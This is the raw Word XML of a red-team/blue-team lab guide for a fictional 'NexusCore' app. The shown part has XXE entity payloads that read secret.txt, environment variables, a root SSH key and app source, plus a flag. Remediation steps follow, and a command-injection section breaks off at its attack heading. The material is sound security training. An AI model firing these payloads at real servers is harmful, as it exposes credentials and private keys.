              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Also try: /proc/self/environ — exposes process environment variables.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Read application secrets:
&lt;!ENTITY xxe SYSTEM "file:///home/user/nexuscore/secret.txt"&gt;
# Read environment variables:
&lt;!ENTITY xxe SYSTEM "file:///proc/self/environ"&gt;
# Read SSH key:
&lt;!ENTITY xxe SYSTEM "file:///root/.ssh/id_rsa"&gt;
# Read Python source:
&lt;!ENTITY xxe SYSTEM "file:///home/user/nexuscore/app.py"&gt;</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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Read /etc/passwd via XXE. Then read secret.txt to capture: NEXUSCORE_MASTER_KEY, ADMIN_PASS, and FLAG: NEXUSCORE{xxe_path_traversal_win}.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Disable DOCTYPE / external entity processing in the parser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Python's xml.etree.ElementTree does not fully support disabling DTD by itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Use the "defusedxml" library which blocks all external entity attacks by default.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Install: pip3 install defusedxml --break-system-packages
# FIXED — replace ET.fromstring with defusedxml:
from defusedxml import ElementTree as SafeET
@app.route("/api/reports/upload", methods=["POST"])
def xxe_fixed():
    # ...
    try:
        # defusedxml raises DTDForbidden, ExternalReferenceForbidden automatically
        root = SafeET.fromstring(clean_xml)
        parsed = {"tag": root.tag, "attrib": root.attrib, ...}
        # Do NOT include external_entities in response
        return jsonify({"parsed": parsed})
    except Exception as e:
        return jsonify({"error": "Invalid XML"}), 400  # generic error</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Strip DOCTYPE declarations before parsing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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At minimum: remove all DOCTYPE declarations from input before passing to parser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The vulnerable code already strips DOCTYPE for parsing — but still resolves entity refs manually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Remove the entity-resolving block entirely — never process SYSTEM entities from user input.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Remove the vulnerable entity-resolution block entirely:
# DELETE these lines from the route:
# file_refs = re.findall(r'&lt;!ENTITY\s+\w+\s+SYSTEM\s+"file://([^"]+)"', xml_str)
# entities  = {}
# for fref in file_refs:
#     try: entities[fref] = open(fref).read()  ← THIS IS THE VULN
#     ...
# if entities: result["external_entities"] = entities  ← NEVER RETURN THIS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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate and restrict input format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Define an XML Schema (XSD) for valid report format — reject anything non-conforming.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Accept only JSON format for report upload and convert server-side if needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Run the XML parser in a sandboxed subprocess with no filesystem access.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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">XXE was used in 2014 PayPal breach and 2019 Facebook bug bounty ($30k). Java and Python XML parsers are often vulnerable by default. Severity: CRITICAL in cloud environments where metadata services and internal config files are readable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Command Injection — Diagnostics Tool</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Command injection occurs when user input is embedded in a shell command without sanitisation. The diagnostics tool runs network commands (ping, nslookup, curl) with the host parameter directly interpolated into the shell command string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
